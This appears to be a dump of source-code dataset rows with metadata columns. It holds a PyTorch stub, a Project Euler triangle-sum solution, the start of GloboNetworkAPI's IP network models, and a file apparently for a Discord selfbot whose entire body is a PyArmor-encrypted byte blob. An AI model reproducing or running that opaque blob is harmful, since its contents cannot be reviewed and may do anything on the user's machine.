] | 1 | 2019-08-04T10:30:23.000Z | 2019-08-04T10:30:23.000Z | icon = ([0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x00000000, 0x00000000, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000ffff, 0x0000ffff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000ffff, 0x0000ffff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000], 1) | 780 | 780 | 0.826923 | 66 | 780 | 9.772727 | 0.060606 | 1.333333 | 1.767442 | 2.108527 | 0.992248 | 0.992248 | 0.992248 | 0.992248 | 0.992248 | 0.992248 | 0 | 0.718487 | 0.084615 | 780 | 1 | 780 | 780 | 0.184874 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.819462 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
40b61c8ad71c758538f4679f189bfae0d6e9c5a9 | 106 | py | Python | dataloader.py | aryanshomray/Image-Denoising | f8a02038ca2418ebdda6eab6ec266d60b9337a93 | [
"MIT"
] | 3 | 2019-12-24T10:50:27.000Z | 2022-02-27T08:51:24.000Z | dataloader.py | aryanshomray/Image-Denoising | f8a02038ca2418ebdda6eab6ec266d60b9337a93 | [
"MIT"
] | null | null | null | dataloader.py | aryanshomray/Image-Denoising | f8a02038ca2418ebdda6eab6ec266d60b9337a93 | [
"MIT"
] | null | null | null | import torch
from torch import nn
import torch.nn.functional as F
class Dataloader(nn.Module):  # nn.Module (capital M); nn.module does not exist
pass
| 13.25 | 31 | 0.764151 | 17 | 106 | 4.764706 | 0.647059 | 0.271605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179245 | 106 | 7 | 32 | 15.142857 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.6 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
40d653c2b6ad1a84aacade807b05b4e47f8aed52 | 1,521 | py | Python | ProjectEuler_018.py | sperek27/Project-Euler | 9ed9eb4d3b492f646c6c7d80ba84e834c7b3d3e7 | [
"MIT"
] | null | null | null | ProjectEuler_018.py | sperek27/Project-Euler | 9ed9eb4d3b492f646c6c7d80ba84e834c7b3d3e7 | [
"MIT"
] | null | null | null | ProjectEuler_018.py | sperek27/Project-Euler | 9ed9eb4d3b492f646c6c7d80ba84e834c7b3d3e7 | [
"MIT"
] | null | null | null | triangle = [75, 95, 64, 17, 47, 82, 18, 35, 87, 10, 20, 4, 82, 47, 65, 19, 1, 23, 75, 3, 34, 88, 2, 77, 73, 7, 63, 67, 99, 65, 4, 28, 6, 16, 70, 92, 41, 41, 26, 56, 83, 40, 80, 70, 33, 41, 48, 72, 33, 47, 32, 37, 16, 94, 29, 53, 71, 44, 65, 25, 43, 91, 52, 97, 51, 14, 70, 11, 33, 28, 77, 73, 17, 78, 39, 68, 17, 57, 91, 71, 52, 38, 17, 14, 91, 43, 58, 50, 27, 29, 48, 63, 66, 4, 68, 89, 53, 67, 30, 73, 16, 69, 87, 40, 31, 4, 62, 98, 27, 23, 9, 70, 98, 73, 93, 38, 53, 60, 4, 23]
t = [[75, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[95, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[17, 47, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[18, 35, 87, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[20, 4, 82, 47, 65, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[19, 1, 23, 75, 3, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[88, 2, 77, 73, 7, 63, 67, 0, 0, 0, 0, 0, 0, 0, 0],
[99, 65, 4, 28, 6, 16, 70, 92, 0, 0, 0, 0, 0, 0, 0],
[41, 41, 26, 56, 83, 40, 80, 70, 33, 0, 0, 0, 0, 0, 0],
[41, 48, 72, 33, 47, 32, 37, 16, 94, 29, 0, 0, 0, 0, 0],
[53, 71, 44, 65, 25, 43, 91, 52, 97, 51, 14, 0, 0, 0, 0],
[70, 11, 33, 28, 77, 73, 17, 78, 39, 68, 17, 57, 0, 0, 0],
[91, 71, 52, 38, 17, 14, 91, 43, 58, 50, 27, 29, 48, 0, 0],
[63, 66, 4, 68, 89, 53, 67, 30, 73, 16, 69, 87, 40, 31, 0],
[4, 62, 98, 27, 23, 9, 70, 98, 73, 93, 38, 53, 60, 4, 23]]
n = 14
for a in range(0, 14):  # collapse the triangle bottom-up, one row per pass
    for i in range(0, n):
        if t[14 - a][i] > t[14 - a][i + 1]:
            t[13 - a][i] = t[13 - a][i] + t[14 - a][i]
        else:
            t[13 - a][i] = t[13 - a][i] + t[14 - a][i + 1]
    n = n - 1  # one fewer column to update in the next (higher) row
print(t[0][0])
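
# Equivalent bottom-up reduction written generically (illustrative only);
# it rebuilds the ragged rows from the flat `triangle` list defined above.
def max_path_sum(rows):
    best = list(rows[-1])
    for row in reversed(rows[:-1]):
        best = [v + max(best[i], best[i + 1]) for i, v in enumerate(row)]
    return best[0]

rows, k = [], 0
for size in range(1, 16):  # 15 rows -> 120 numbers in total
    rows.append(triangle[k:k + size])
    k += size
print(max_path_sum(rows))  # should print 1074 as well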
| 54.321429 | 480 | 0.434583 | 404 | 1,521 | 1.636139 | 0.212871 | 0.278366 | 0.354009 | 0.399395 | 0.835098 | 0.800303 | 0.770045 | 0.700454 | 0.645991 | 0.577912 | 0 | 0.533454 | 0.272847 | 1,521 | 27 | 481 | 56.333333 | 0.064195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.04 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
40f58ed27f47706b98039c389b61e46443f5ab52 | 4,181 | py | Python | TheAmaraSelfBot.py | novicered/TheAmaraSelfBot | 5133d4c7a814e83df6c84e8e40c4cccb557ff685 | [
"Unlicense"
] | null | null | null | TheAmaraSelfBot.py | novicered/TheAmaraSelfBot | 5133d4c7a814e83df6c84e8e40c4cccb557ff685 | [
"Unlicense"
] | null | null | null | TheAmaraSelfBot.py | novicered/TheAmaraSelfBot | 5133d4c7a814e83df6c84e8e40c4cccb557ff685 | [
"Unlicense"
] | null | null | null | from pytransform import pyarmor_runtime
pyarmor_runtime()
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\xbd\x03\x00\x00\x00\x00\x00\x18\xff\x1d\x5e\x60\x11\x72\x24\x96\x8f\x34\x92\x52\xda\xab\x44\x2e\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x9f\x68\xc2\x05\x01\x9f\x33\x2b\xee\xc4\x4f\x80\xe4\x93\xbc\xfb\x69\xe0\x42\x5f\x9f\x64\x66\x13\x8f\xd3\xfd\xac\xc4\xa2\x28\x19\x87\xcd\x19\xef\xeb\x10\x02\x5c\x20\x5f\x40\x1f\xee\x74\xcf\x87\x02\x58\xc2\xbb\x34\x58\xb2\x8d\x9f\x63\x76\x49\xef\x05\x6f\x68\x3d\x68\xb5\x87\x69\xe5\x14\xeb\xd0\xaa\x6e\x17\x93\x42\xa5\xde\x45\x62\x18\x6d\x7f\xe6\xdc\x5a\x1d\xd3\xf0\x1d\x07\x25\x41\xfa\x41\x0a\x7c\x51\x14\x0e\xb4\x35\xdd\x19\xfc\x8a\xf3\xef\xff\x28\xa0\x71\x01\x0a\xe1\xf8\x11\x1e\xdc\x97\xdc\x5e\x8e\x0f\x47\x06\x7e\x15\x4a\xa4\x1b\xd4\xa0\x8e\x10\xec\x0d\x77\x36\xea\x93\xe8\xad\x11\xcd\x5d\xcf\x9d\xc1\x6f\x7a\xdf\xba\x7d\xba\x1d\xe9\x21\xa0\xac\xc4\x73\x64\x39\xec\x84\xa5\x5a\x58\xb1\xcd\x93\x18\x10\x9b\x0d\x8d\xc2\x70\x17\x80\xb6\xab\x35\x39\xb8\xe9\x72\x70\xea\x15\x7a\x88\x56\x96\xb3\xaa\x3d\xf5\x56\xd0\x6a\x80\xdd\x2c\x14\x29\x0f\x99\x5c\x53\xfa\xc2\x05\x0a\x9d\xd1\x9a\x21\xab\x28\xae\x80\x89\xbc\x68\xce\x0c\x66\x5d\xa7\x44\xc6\x0b\xb2\x58\x0c\xb7\x39\x60\x40\xd1\x66\x15\xb4\xb1\xf5\x46\x59\xe8\x85\xa4\x9f\x1d\xc1\xe4\xd3\x6e\x17\x12\x50\xa5\xed\xe7\xa5\x33\x7f\x76\x90\x8a\xe5\xe5\xe5\x99\xda\x6d\xf3\xba\xf1\x32\x0a\x8b\xe8\x55\xba\x81\x04\x0e\x69\x1e\x3c\x45\xe4\x2d\x2f\xc1\xd6\x00\x93\xae\x6e\x76\x32\x58\x34\x5c\x61\x1b\xbd\x95\xc8\x8e\x81\x69\x4c\x99\xce\x0d\x7d\x92\xf4\x09\x6c\x1f\x3f\xc7\x92\xa7\xdc\xbf\x8f\xa0\xea\xe6\xe8\xe8\xea\x95\x63\x32\x0d\xbe\xbc\xff\xdc\xbf\x0b\x61\xb8\xc8\xbe\x02\x7b\x17\x57\xf0\x31\xf6\x78\xf1\xcc\xf4\x66\xad\xc1\xe5\xf7\x1e\x8f\xaf\xbc\xfa\x84\x6a\x7f\xd7\xa9\x8b\x5a\x3c\x83\xf6\xfc\x95\xf9\xe4\xef\x8d\x52\x30\x3e\x0d\x5b\x95\x32\xc4\x82\x68\x2f\x95\x06\xb9\xa9\x3f\xb3\x7d\x35\x5e\xc4\x0a\x93\xbd\x3b\x6d\x19\xd0\xc9\x4e\x78\x24\xb9\x02\xcb\xfc\xd6\xc5\x32\x4a\x60\xe2\x20\x89\xf7\xc7\xc0\xb5\x5d\x6f\xcf\x92\x4e\x30\x73\x8b\x0a\x30\x19\x6a\xa8\xea\x84\x4f\x7a\xaa\x13\xe7\xb5\x26\xcd\x8b\x34\x2a\x2f\xf6\xde\xf2\xfb\xa8\x31\xbb\x88\x4c\x54\x63\x9b\x8b\x03\x32\xec\xf5\xa7\x28\x7d\xe4\xa7\x3f\xfa\xda\xe1\x54\x55\x77\xd0\x43\x2d\x5e\x58\x0d\xd5\x09\xcc\xfe\x28\x62\xc3\x22\xd3\xf8\x14\x24\x42\x34\x27\x58\xda\xca\xef\x35\xb4\x58\xbf\xa6\x87\xbe\x90\x42\xe4\x96\x13\x8d\x01\x09\x7d\xd1\x61\x29\xfc\xad\xf6\x87\x99\x24\x30\xe0\xbb\xea\x4d\xee\x2c\x93\x53\x12\xbd\xa4\xe5\xe0\x87\xdf\xf7\x64\xcf\x0f\x86\x69\x7c\x86\x58\x3c\xc2\xa5\x42\x5f\xea\x23\x9c\x93\x3f\x5e\xad\xc2\x78\x39\x4a\xc9\x8f\x08\x41\x4a\x1e\x45\xcf\xd0\xd8\x49\x32\xa7\x67\x65\xe8\xe7\x9d\x57\x5c\x86\xd2\x52\x19\x3c\xdc\x34\x54\xe3\xec\xd4\x1c\xb2\x52\xa6\xf3\x4b\x2a\x09\x58\xfd\xfa\x36\xda\xcb\xc5\xe2\x70\xdb\xd3\xa3\x56\xd6\x5d\x37\xab\x38\x10\xdd\x53\x92\xf5\xd8\x7b\x22\x10\x01\x10\x73\x1d\xac\x99\x5a\x74\xe7\x94\x3d\xac\x12\xe9\xee\x8c\xfd\xdb\xad\x53\xbf\x98\xbe\x66\x42\x86\x05\xa4\xe9\xe0\x3b\xc6\x2f\x17\x77\x56\x28\x93\x49\xe0\x31\x4d\x0e\x85\xe6\x57\xae\x1b\x47\x09\x2e\x98\x8b\x61\xb1\x09\x64\x2f\x59\x38\xa8\xc1\x04\xcc\xa7\x7e\x8f\xe8\x8b\x56\x1d\xc5\xb5\xd4\x4b\x81\xb4\x5d\x7f\x7a\xb5\x03\x8e\x39\x27\x57\x2c\x09\xa6\x81\x12\xfb\xb8\xb2\xbf\x6b\xec\x73\xc0\xa2\x39\xbd\x6b\xf0\x24\x91\xa1\x6b\xb7\x75\x51\x28\xb6\xe1\xbe\x9a\x7e\x51\x54\x69\xc1\x6f\x5f\x3d\x0f\xfb\xaf\x0e\xa7\xa7\xa2\xff\x2c\x9b\xa9\x60\xee\x57\xeb\x4e\xfb\xa7\x2f\x0b\x0a\x47\x90\x24\x76\x01\xec\xac\x88\x01\xbb\xdf\x28\x4b\x3d\xea\x4a\xd6\xdd\x2a\
xae\x6f\xdb\x2b\xc3\x36\xfb\xfb\x00\xda\xe3\xe2\x1e\xb3\x1b\xc8\x11\x05\x38\x31\x9f\xa9\x23\x4b\x02\x10\x3b\x03\xc9\xd4\x54\x32\xd3\x67\xc3\x3c\x09\x82\xba\x7a\x2c\x5f\x37\x38\x9e\x9d\x6e\x4e\x15\xbf\x12\x62\xcd\x20\xd5\x52\xab\xa5\x38\x0e\x36\x22\xb3\x5d\xe2\x8b\x73\x4e\xde\xf9\xd3\x6c\x0a\x6c\xef\x93\x40\x60\xab\x55\xff\x3d\xbe\x2b\x2f\xb3\x07\x9c\x07\xfc\xd2\xb0\xa4\x1a\xa4\x85\xfa\x80\xe9\xea\x4d\x16\x94\x27\xa5\xf3\x72\xb0\xc9\x75\xdc\x79\xc1\xdf\x95\x6b\xaa\xdb\xd6\x09\x37\xc0\xf0\x66\xd1\x61\x05\x4f\x86\xd7\x0f\x1e\xe6\x01\x61\x66\x73\x5f\x60\xad\xda', 2) | 1,393.666667 | 4,123 | 0.751734 | 1,033 | 4,181 | 3.029042 | 0.25363 | 0.042186 | 0.046021 | 0.042186 | 0.019175 | 0.014382 | 0.014382 | 0 | 0 | 0 | 0 | 0.304817 | 0.001913 | 4,181 | 3 | 4,123 | 1,393.666667 | 0.445004 | 0 | 0 | 0 | 0 | 0.333333 | 0.976566 | 0.976566 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
9060bcd3a1cfb7aaa95ee9fc8ca42881a4c38c13 | 159,114 | py | Python | networkapi/ip/models.py | brunodevel/GloboNetworkAPI | ea8eebc0337636f9250e628cc392514934db8edd | [
"Apache-2.0"
] | null | null | null | networkapi/ip/models.py | brunodevel/GloboNetworkAPI | ea8eebc0337636f9250e628cc392514934db8edd | [
"Apache-2.0"
] | null | null | null | networkapi/ip/models.py | brunodevel/GloboNetworkAPI | ea8eebc0337636f9250e628cc392514934db8edd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from _mysql_exceptions import OperationalError
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.db import transaction
from django.db.models import get_model
from networkapi.ambiente.models import ConfigEnvironmentInvalidError
from networkapi.ambiente.models import IP_VERSION
from networkapi.api_vip_request import syncs
from networkapi.distributedlock import distributedlock
from networkapi.distributedlock import LOCK_ENVIRONMENT
from networkapi.distributedlock import LOCK_VIP
from networkapi.equipamento.models import EquipamentoAmbienteDuplicatedError
from networkapi.equipamento.models import EquipamentoAmbienteNotFoundError
from networkapi.equipamento.models import EquipamentoError
from networkapi.exception import InvalidValueError
from networkapi.infrastructure.ipaddr import AddressValueError
from networkapi.infrastructure.ipaddr import IPNetwork
from networkapi.infrastructure.ipaddr import IPv4Address
from networkapi.infrastructure.ipaddr import IPv4Network
from networkapi.infrastructure.ipaddr import IPv6Address
from networkapi.infrastructure.ipaddr import IPv6Network
from networkapi.models.BaseModel import BaseModel
from networkapi.queue_tools import queue_keys
from networkapi.queue_tools.queue_manager import QueueManager
from networkapi.util import mount_ipv4_string
from networkapi.util import mount_ipv6_string
from networkapi.util.decorators import cached_property
from networkapi.util.geral import get_app
Equipamento = get_model('equipamento', 'Equipamento')
EquipamentoAmbiente = get_model('equipamento', 'EquipamentoAmbiente')
TipoEquipamento = get_model('equipamento', 'TipoEquipamento')
Ambiente = get_model('ambiente', 'Ambiente')
ConfigEnvironment = get_model('ambiente', 'ConfigEnvironment')
EnvironmentVip = get_model('ambiente', 'EnvironmentVip')
# TipoRede = get_model('vlan', 'TipoRede')
Vlan = get_model('vlan', 'Vlan')
FilterEquipType = get_model('filterequiptype', 'FilterEquipType')
Configuration = get_model('config', 'Configuration')
class NetworkIPv4Error(Exception):
"""Generic exception for everything related to NetworkIPv4."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
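# All exception classes below share this cause/message pattern. A minimal
# usage sketch (hypothetical values, not from the original source):
#
#     >>> try:
#     ...     raise NetworkIPv4Error(ValueError('db down'), u'Failed to save')
#     ... except NetworkIPv4Error as e:
#     ...     print(e)
#     Caused by: db down, Message: Failed to save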
class NetworkIPv6Error(Exception):
"""Generic exception for everything related to NetworkIPv6."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class NetworkIPvXError(Exception):
"""Generic exception for everything related to both NetworkIPv4 and NetworkIPv6."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class NetworkIPRangeEnvError(NetworkIPvXError):
"""Exception for two environments with same ip range when trying to add new network."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class IpError(Exception):
"""Representa um erro ocorrido durante acesso à tabelas relacionadas com IP."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Caused by: %s, Message: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class NetworkIPv4NotFoundError(NetworkIPv4Error):
"""Exception to search by primary key."""
def __init__(self, cause, message=None):
NetworkIPv4Error.__init__(self, cause, message)
class NetworkIPv6NotFoundError(NetworkIPv6Error):
"""Exception to search by primary key."""
def __init__(self, cause, message=None):
NetworkIPv6Error.__init__(self, cause, message)
class NetworkIPvXNotFoundError(NetworkIPvXError):
"""Exception to search by primary key."""
def __init__(self, cause, message=None):
NetworkIPvXError.__init__(self, cause, message)
class NetworkIPv4AddressNotAvailableError(NetworkIPv4Error):
"""Exception to unavailable address to create a new NetworkIPv4."""
def __init__(self, cause, message=None):
NetworkIPv4Error.__init__(self, cause, message)
class NetworkIPv6AddressNotAvailableError(NetworkIPv6Error):
"""Exception to unavailable address to create a new NetworkIPv6."""
def __init__(self, cause, message=None):
NetworkIPv6Error.__init__(self, cause, message)
class NetworkIpAddressNotAvailableError(NetworkIPvXError):
"""Exception to unavailable address."""
def __init__(self, cause, message=None):
NetworkIPvXError.__init__(self, cause, message)
class IpNotFoundError(IpError):
"""Retorna exceção para pesquisa de IP por chave primária."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpEquipmentNotFoundError(IpError):
"""Retorna exceção para pesquisa de IP-Equipamento por chave primária/ip e equipamento."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpEquipamentoDuplicatedError(IpError):
"""Retorna exceção para pesquisa de IP-Equipamento duplicado."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpNotAvailableError(IpError):
"""Retorna exceção porque não existe um IP disponível para a VLAN."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpEquipmentAlreadyAssociation(IpError):
"""Retorna exceção caso um Ip já esteja associado a um determinado equipamento."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpNotFoundByEquipAndVipError(IpError):
"""Retorna exceção caso um Ip já esteja associado a um determinado equipamento."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpCantBeRemovedFromVip(IpError):
"""Retorna exceção caso um Ip não possa ser excluído por estar em uso por uma requisição VIP."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class NetworkNotInEvip(IpError):
"""Retorna exceção caso não haja uma rede Ipv4 ou Ipv6 para o Ambiente Vip."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpRangeAlreadyAssociation(IpError):
"""Returns exception for equipment already having ip with same ip range in another network."""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpEquipCantDissociateFromVip(IpError):
"""Returns exception when trying to dissociate ip and equipment, but equipment is the last balancer for Vip Request"""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class IpCantRemoveFromServerPool(IpError):
"""Returns exception when trying to dissociate ip and equipment, but equipment is the last balancer for Vip Request"""
def __init__(self, cause, message=None):
IpError.__init__(self, cause, message)
class NetworkIPv4(BaseModel):
id = models.AutoField(
primary_key=True
)
oct1 = models.IntegerField(
db_column='rede_oct1'
)
oct2 = models.IntegerField(
db_column='rede_oct2'
)
oct3 = models.IntegerField(
db_column='rede_oct3'
)
oct4 = models.IntegerField(
db_column='rede_oct4'
)
block = models.IntegerField(
db_column='bloco'
)
mask_oct1 = models.IntegerField(
db_column='masc_oct1'
)
mask_oct2 = models.IntegerField(
db_column='masc_oct2'
)
mask_oct3 = models.IntegerField(
db_column='masc_oct3'
)
mask_oct4 = models.IntegerField(
db_column='masc_oct4'
)
broadcast = models.CharField(
max_length=15,
blank=False
)
vlan = models.ForeignKey(
'vlan.Vlan',
db_column='id_vlan'
)
network_type = models.ForeignKey(
'vlan.TipoRede',
null=True,
db_column='id_tipo_rede'
)
ambient_vip = models.ForeignKey(
'ambiente.EnvironmentVip',
null=True,
db_column='id_ambientevip'
)
cluster_unit = models.CharField(
max_length=45,
db_column='cluster_unit'
)
active = models.BooleanField()
log = logging.getLogger('NetworkIPv4')
class Meta(BaseModel.Meta):
db_table = u'redeipv4'
managed = True
def _get_networkv4(self):
"""Returns formated ip."""
return '%s/%s' % (self.formated_octs, self.block)
networkv4 = property(_get_networkv4)
def _get_formated_octs(self):
"""Returns formated octs."""
return '%s.%s.%s.%s' % (self.oct1, self.oct2, self.oct3, self.oct4)
formated_octs = property(_get_formated_octs)
def _get_mask_formated(self):
"""Returns formated mask."""
return '%s.%s.%s.%s' % (self.mask_oct1, self.mask_oct2,
self.mask_oct3, self.mask_oct4)
mask_formated = property(_get_mask_formated)
def _get_wildcard(self):
return '%d.%d.%d.%d' % (255 - self.mask_oct1,
255 - self.mask_oct2,
255 - self.mask_oct3,
255 - self.mask_oct4)
wildcard = property(_get_wildcard)
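# Hedged sketch of the wildcard arithmetic above (illustrative values): the
# wildcard is the octet-wise complement of the netmask, e.g. for a /24 mask
# 255.255.255.0:
#
#     >>> [255 - o for o in (255, 255, 255, 0)]
#     [0, 0, 0, 255]    # rendered as '0.0.0.255'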
def _get_dhcprelay(self):
dhcprelay = self.dhcprelayipv4_set.all()
return dhcprelay
dhcprelay = property(_get_dhcprelay)
@classmethod
def get_by_pk(cls, id):
"""Get NetworkIPv4 by id.
@return: NetworkIPv4.
@raise NetworkIPv4NotFoundError: NetworkIPv4 is not registered.
@raise NetworkIPv4Error: Failed to search for the NetworkIPv4.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return NetworkIPv4.objects.filter(id=id).uniqueResult()
except ObjectDoesNotExist, e:
raise NetworkIPv4NotFoundError(
e, u'There is no NetworkIPv4 with pk = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Failure to search the NetworkIPv4.')
raise NetworkIPv4Error(e, u'Failure to search the NetworkIPv4.')
def activate(self, authenticated_user):
try:
self.active = 1
self.save()
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv4V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv4_ACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv4_ACTIVATE,
'kind': queue_keys.NETWORKv4_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error activating NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error activating NetworkIPv4.')
def deactivate(self, authenticated_user, commit=False):
"""
Update status column to 'active = 0'
@param authenticated_user: Authenticated user
@raise NetworkIPv4Error: Error disabling a NetworkIPv4.
"""
from networkapi.api_network.serializers.v1 import NetworkIPv4Serializer
try:
self.active = 0
# Send to Queue
queue_manager = QueueManager()
serializer = NetworkIPv4Serializer(self)
data_to_queue = serializer.data
data_to_queue.update(
{'description': queue_keys.NETWORKv4_DEACTIVATE})
queue_manager.append({'action': queue_keys.NETWORKv4_DEACTIVATE,
'kind': queue_keys.NETWORKv4_KEY, 'data': data_to_queue})
queue_manager.send()
self.save(authenticated_user, commit=commit)
except Exception, e:
self.log.error(u'Error disabling NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error disabling NetworkIPv4.')
def edit_network_ipv4(self, authenticated_user, id_net_type, id_env_vip, cluster_unit):
try:
self.network_type = id_net_type
self.ambient_vip = id_env_vip
self.cluster_unit = cluster_unit
self.save()
except Exception, e:
self.log.error(u'Error on update NetworkIPv4.')
raise NetworkIPv4Error(e, u'Error on update NetworkIPv4.')
def add_network_ipv4(self, user, id_vlan, network_type, evip, prefix=None):
"""Allocate and Insert new NetworkIPv4 in database
@return: Vlan map
@raise VlanNotFoundError: Vlan is not registered.
@raise VlanError: Failed to search for the Vlan
@raise ConfigEnvironmentInvalidError: Invalid Environment Configuration or not registered
@raise NetworkIPv4Error: Error persisting a NetworkIPv4.
@raise NetworkIPv4AddressNotAvailableError: Unavailable address to create a NetworkIPv4.
@raise InvalidValueError: Network type does not exist.
"""
self.vlan = Vlan().get_by_pk(id_vlan)
network_found = None
stop = False
internal_network_type = None
type_ipv4 = IP_VERSION.IPv4[0]
try:
# Find all configs type v4 in environment
configs = ConfigEnvironment.get_by_environment(
self.vlan.ambiente.id).filter(ip_config__type=IP_VERSION.IPv4[0])
# If not found, an exception is thrown
if len(configs) == 0:
raise ConfigEnvironmentInvalidError(
None, u'Invalid Configuration')
# Needs to lock the IPv4 listing while any allocation is in progress;
# otherwise two networks could be allocated with the same range
with distributedlock(LOCK_ENVIRONMENT % self.vlan.ambiente.id):
# Find all networks related to the environment
nets = NetworkIPv4.objects.filter(
vlan__ambiente__id=self.vlan.ambiente.id)
# Cast to API class
networksv4 = set([(IPv4Network(
'%d.%d.%d.%d/%d' % (net_ip.oct1, net_ip.oct2, net_ip.oct3, net_ip.oct4, net_ip.block))) for net_ip in nets])
# For each configuration found in the environment
for config in configs:
# If a network has already been found, stop
if stop:
break
# Need to be IPv4
if config.ip_config.type == IP_VERSION.IPv4[0]:
net4 = IPv4Network(config.ip_config.subnet)
if prefix is not None:
new_prefix = int(prefix)
else:
new_prefix = int(config.ip_config.new_prefix)
self.log.info(
u'Prefix that will be used: %s' % new_prefix)
# For each subnet generated with configs
for subnet in net4.iter_subnets(new_prefix=new_prefix):
net_found = True
for network in networksv4:
if subnet in network:
net_found = False
# Checks if the network generated is UNUSED
if net_found:
